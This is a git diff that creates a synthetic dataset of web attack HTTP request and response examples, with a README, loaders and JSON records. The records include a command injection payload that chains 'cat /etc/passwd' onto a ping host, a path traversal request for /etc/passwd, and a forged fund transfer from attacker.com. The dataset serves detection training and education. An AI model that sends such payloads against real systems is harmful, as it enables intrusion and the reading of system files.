213 changes: 212 additions & 1 deletion README.md
@@ -1 +1,212 @@
# synthetic-security-dataset
# Synthetic Security Dataset

A dataset of synthetic HTTP request and response examples demonstrating common web application attacks. It is designed for security research, training machine learning models for threat detection, and education.

## Overview

This repository contains synthetic examples of common web application security attacks, organized by attack category. Each example includes:

- Complete HTTP request details (method, URL, headers, body)
- Corresponding HTTP response
- Attack vector description
- Malicious payload
- Detection indicators

## Dataset Structure

```
dataset/
├── schema.json          # JSON schema defining the data structure
├── index.json           # Dataset manifest: version, counts, and example paths
├── sql-injection/       # SQL injection attack examples
├── xss/                 # Cross-Site Scripting (XSS) examples
├── csrf/                # Cross-Site Request Forgery examples
├── path-traversal/      # Directory/path traversal examples
├── command-injection/   # OS command injection examples
└── xxe/                 # XML External Entity (XXE) examples
```

## Attack Categories

### 1. SQL Injection
SQL injection attacks attempt to manipulate database queries by inserting malicious SQL code into input fields.

**Examples:**
- Authentication bypass
- UNION-based data extraction
- Blind SQL injection

### 2. Cross-Site Scripting (XSS)
XSS attacks inject malicious scripts into web pages viewed by other users.

**Examples:**
- Reflected XSS via URL parameters
- Stored XSS via user-generated content
- DOM-based XSS

### 3. Cross-Site Request Forgery (CSRF)
CSRF attacks trick users into executing unwanted actions on web applications where they're authenticated.

**Examples:**
- State-changing requests without CSRF tokens
- Malicious form auto-submission

### 4. Path Traversal
Path traversal attacks access files and directories outside the intended directory structure.

**Examples:**
- Reading system files using dot-dot-slash sequences
- Accessing sensitive configuration files
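
As a rough illustration of how dot-dot-slash sequences escape a directory, the sketch below resolves each query parameter value against a base directory and flags values that land outside it. The function name `has_path_traversal` and the base directory `/srv/files` are hypothetical and not part of this dataset; this is a minimal check, not a complete defense.

```python
import posixpath
from urllib.parse import urlsplit, parse_qs

def has_path_traversal(url, base_dir="/srv/files"):
    """Return True if any query parameter value resolves outside base_dir.

    base_dir is a hypothetical download root chosen for illustration.
    """
    query = urlsplit(url).query
    # parse_qs percent-decodes values, so %2e%2e%2f is treated like ../
    for values in parse_qs(query).values():
        for value in values:
            # normpath collapses ".." segments; join discards base_dir
            # entirely when value is an absolute path
            resolved = posixpath.normpath(posixpath.join(base_dir, value))
            if resolved != base_dir and not resolved.startswith(base_dir + "/"):
                return True
    return False
```

For instance, `has_path_traversal("/download?file=../../../../etc/passwd")` is `True`, while a plain file name such as `file=report.pdf` stays inside the base directory.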

### 5. Command Injection
Command injection attacks execute arbitrary operating system commands on the server.

**Examples:**
- Command chaining using semicolons
- Piping commands
- Command substitution
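
The three techniques listed above all rely on shell metacharacters appearing in user input. A naive scan for them might look like the following sketch; the name `find_shell_metacharacters` and the exact pattern are assumptions made for illustration, and a match is only a hint, since these characters also occur in benign input.

```python
import re

# Metacharacters for the techniques above: ';', '&&' and '||' for chaining,
# '|' for piping, '$(' and backticks for command substitution.
SHELL_META = re.compile(r";|&&|\|\||\||\$\(|`")

def find_shell_metacharacters(value):
    """Return the distinct metacharacters in value, in order of first appearance."""
    seen = []
    for match in SHELL_META.finditer(value):
        if match.group() not in seen:
            seen.append(match.group())
    return seen
```

Applied to a payload such as `8.8.8.8; cat /etc/passwd`, the function reports the semicolon; a bare IP address yields an empty list.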

### 6. XML External Entity (XXE)
XXE attacks exploit XML parsers that process external entity references.

**Examples:**
- Local file disclosure
- Server-side request forgery (SSRF)
- Denial of service

## Data Format

Each attack example is stored as a JSON file following this structure:

```json
{
  "id": "unique-identifier",
  "category": "Attack Category",
  "description": "Description of the attack scenario",
  "severity": "critical|high|medium|low",
  "request": {
    "method": "HTTP_METHOD",
    "url": "/path?params",
    "headers": {},
    "body": "request body or null"
  },
  "response": {
    "status": 200,
    "headers": {},
    "body": "response body"
  },
  "attack_vector": "Explanation of how the attack works",
  "payload": "The actual malicious payload",
  "indicators": ["indicator1", "indicator2"]
}
```

See `dataset/schema.json` for the complete JSON schema definition.
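
For a quick sanity check without a schema validator, the structure above can be verified by hand. The sketch below assumes that every field shown in the structure is required, which `dataset/schema.json` may or may not enforce; the function name `validate_example` is hypothetical.

```python
# Assumption: all fields from the structure above are required.
REQUIRED_FIELDS = {
    "id", "category", "description", "severity", "request",
    "response", "attack_vector", "payload", "indicators",
}
SEVERITIES = {"critical", "high", "medium", "low"}

def validate_example(example):
    """Return a list of problems found; an empty list means none were found."""
    problems = []
    missing = REQUIRED_FIELDS - example.keys()
    if missing:
        problems.append(f"missing fields: {sorted(missing)}")
    if "severity" in example and example["severity"] not in SEVERITIES:
        problems.append(f"unknown severity: {example['severity']!r}")
    for part, keys in (("request", ("method", "url", "headers", "body")),
                       ("response", ("status", "headers", "body"))):
        if part not in example:
            continue  # already reported as a missing field
        section = example[part]
        if not isinstance(section, dict):
            problems.append(f"{part} must be an object")
            continue
        absent = [key for key in keys if key not in section]
        if absent:
            problems.append(f"{part} is missing: {absent}")
    if "indicators" in example and not isinstance(example["indicators"], list):
        problems.append("indicators must be a list")
    return problems
```

This only checks presence and basic types; the JSON schema remains the authoritative definition.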

## Usage

### Loading the Dataset

#### Python
```python
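import json
from pathlib import Path

def load_dataset(dataset_path='dataset'):
    """Load every example JSON file found in the category subdirectories."""
    examples = []
    # Only subdirectories are scanned, so top-level files such as
    # schema.json are not loaded as examples. Sorting keeps the order stable.
    for category_dir in sorted(Path(dataset_path).iterdir()):
        if category_dir.is_dir():
            for example_file in sorted(category_dir.glob('*.json')):
                try:
                    with open(example_file, 'r', encoding='utf-8') as f:
                        examples.append(json.load(f))
                except json.JSONDecodeError as e:
                    # Report the malformed file and continue with the rest
                    print(f"Error parsing {example_file}: {e}")
    return examples

# Load all examples
dataset = load_dataset()
print(f"Loaded {len(dataset)} attack examples")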
```

#### JavaScript/Node.js
```javascript
const fs = require('fs');
const path = require('path');

function loadDataset(datasetPath = 'dataset') {
  const examples = [];
  const categories = fs.readdirSync(datasetPath);

  categories.forEach(category => {
    const categoryPath = path.join(datasetPath, category);
    if (fs.statSync(categoryPath).isDirectory()) {
      const files = fs.readdirSync(categoryPath);
      files.forEach(file => {
        if (file.endsWith('.json')) {
          try {
            const data = JSON.parse(
              fs.readFileSync(path.join(categoryPath, file), 'utf8')
            );
            examples.push(data);
          } catch (error) {
            console.error(`Error parsing ${file}:`, error.message);
          }
        }
      });
    }
  });

  return examples;
}

// Load all examples
const dataset = loadDataset();
console.log(`Loaded ${dataset.length} attack examples`);
```

### Filtering by Category

```python
# Get all SQL injection examples
sql_injections = [ex for ex in dataset if ex['category'] == 'SQL Injection']

# Get all critical severity attacks
critical_attacks = [ex for ex in dataset if ex['severity'] == 'critical']
```
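
Beyond filtering, it can be useful to tally examples per category and severity, for example to check the distribution before training a model. The sketch below uses `collections.Counter`; the function name `summarize` and the output keys `by_category` and `by_severity` are illustrative choices, not part of the dataset format.

```python
from collections import Counter

def summarize(examples):
    """Count loaded examples overall, per category, and per severity."""
    return {
        "total_examples": len(examples),
        "by_category": dict(Counter(ex["category"] for ex in examples)),
        "by_severity": dict(Counter(ex["severity"] for ex in examples)),
    }
```

Calling `summarize(dataset)` on the list returned by `load_dataset()` gives a small dictionary that can be printed or compared against expected counts.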

## Use Cases

1. **Security Training**: Educational resource for learning about common web vulnerabilities
2. **Machine Learning**: Training data for developing attack detection models
3. **Testing Security Tools**: Benchmark dataset for evaluating WAFs and IDS/IPS systems
4. **Security Research**: Reference examples for studying attack patterns
5. **CTF Challenges**: Base material for capture-the-flag security exercises

## Contributing

Contributions are welcome! To add new attack examples:

1. Follow the JSON schema defined in `dataset/schema.json`
2. Place the example in the appropriate category directory
3. Use descriptive IDs and clear descriptions
4. Include realistic HTTP headers and responses
5. Provide clear indicators for detection

## Important Notes

⚠️ **Warning**: This dataset contains examples of malicious attacks. Use only for:
- Educational purposes
- Security research
- Controlled testing environments
- Training security systems

**DO NOT** use these examples to attack real systems. Unauthorized access to computer systems is illegal.

## License

This dataset is provided for educational and research purposes. Please use responsibly and ethically.

## Disclaimer

The examples in this dataset are synthetic and created for educational purposes. They should only be used in controlled environments with proper authorization. The maintainers are not responsible for any misuse of this information.
29 changes: 29 additions & 0 deletions dataset/command-injection/example-1.json
@@ -0,0 +1,29 @@
{
  "id": "command-injection-001",
  "category": "Command Injection",
  "description": "OS command injection through ping utility",
  "severity": "critical",
  "request": {
    "method": "POST",
    "url": "/network-tools/ping",
    "headers": {
      "Content-Type": "application/json",
      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)"
    },
    "body": "{\"host\": \"8.8.8.8; cat /etc/passwd\"}"
  },
  "response": {
    "status": 200,
    "headers": {
      "Content-Type": "text/plain"
    },
    "body": "PING 8.8.8.8 (8.8.8.8) 56(84) bytes of data.\n64 bytes from 8.8.8.8: icmp_seq=1 ttl=64 time=0.045 ms\n\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin"
  },
  "attack_vector": "Command injection using semicolon to chain commands",
  "payload": "8.8.8.8; cat /etc/passwd",
  "indicators": [
    "Command separators (;, &&, ||)",
    "System commands in user input",
    "Unexpected command output in response"
  ]
}
31 changes: 31 additions & 0 deletions dataset/csrf/example-1.json
@@ -0,0 +1,31 @@
{
  "id": "csrf-001",
  "category": "Cross-Site Request Forgery (CSRF)",
  "description": "CSRF attack to transfer funds without user consent",
  "severity": "high",
  "request": {
    "method": "POST",
    "url": "/transfer",
    "headers": {
      "Content-Type": "application/x-www-form-urlencoded",
      "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
      "Referer": "http://attacker.com/malicious.html",
      "Cookie": "session=victim_session_token"
    },
    "body": "to_account=attacker_account&amount=1000&currency=USD"
  },
  "response": {
    "status": 200,
    "headers": {
      "Content-Type": "application/json"
    },
    "body": "{\"status\": \"success\", \"message\": \"Transfer completed\", \"transaction_id\": \"txn_987654\"}"
  },
  "attack_vector": "CSRF attack initiated from external malicious site",
  "payload": "Malicious HTML form auto-submitting to transfer endpoint",
  "indicators": [
    "Missing or invalid CSRF token",
    "Referer from external domain",
    "Unexpected state-changing request"
  ]
}
72 changes: 72 additions & 0 deletions dataset/index.json
@@ -0,0 +1,72 @@
{
  "dataset_version": "1.0.0",
  "created_date": "2025-10-28",
  "description": "Synthetic HTTP request/response dataset for malicious attack examples",
  "total_examples": 8,
  "categories": {
    "SQL Injection": {
      "count": 2,
      "severity_distribution": {
        "critical": 2
      },
      "examples": [
        "dataset/sql-injection/example-1.json",
        "dataset/sql-injection/example-2.json"
      ]
    },
    "Cross-Site Scripting (XSS)": {
      "count": 2,
      "severity_distribution": {
        "high": 2
      },
      "examples": [
        "dataset/xss/example-1.json",
        "dataset/xss/example-2.json"
      ]
    },
    "Cross-Site Request Forgery (CSRF)": {
      "count": 1,
      "severity_distribution": {
        "high": 1
      },
      "examples": [
        "dataset/csrf/example-1.json"
      ]
    },
    "Path Traversal": {
      "count": 1,
      "severity_distribution": {
        "critical": 1
      },
      "examples": [
        "dataset/path-traversal/example-1.json"
      ]
    },
    "Command Injection": {
      "count": 1,
      "severity_distribution": {
        "critical": 1
      },
      "examples": [
        "dataset/command-injection/example-1.json"
      ]
    },
    "XML External Entity (XXE)": {
      "count": 1,
      "severity_distribution": {
        "critical": 1
      },
      "examples": [
        "dataset/xxe/example-1.json"
      ]
    }
  },
  "severity_overview": {
    "critical": 5,
    "high": 3,
    "medium": 0,
    "low": 0
  },
  "schema_version": "1.0.0",
  "schema_location": "dataset/schema.json"
}
30 changes: 30 additions & 0 deletions dataset/path-traversal/example-1.json
@@ -0,0 +1,30 @@
{
  "id": "path-traversal-001",
  "category": "Path Traversal",
  "description": "Directory traversal attack to access sensitive files",
  "severity": "critical",
  "request": {
    "method": "GET",
    "url": "/download?file=../../../../etc/passwd",
    "headers": {
      "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
      "Accept": "*/*"
    },
    "body": null
  },
  "response": {
    "status": 200,
    "headers": {
      "Content-Type": "text/plain",
      "Content-Disposition": "attachment; filename=passwd"
    },
    "body": "root:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin"
  },
  "attack_vector": "Path traversal using dot-dot-slash sequences",
  "payload": "../../../../etc/passwd",
  "indicators": [
    "Dot-dot-slash sequences (../)",
    "Access to system files",
    "Path manipulation in file parameter"
  ]
}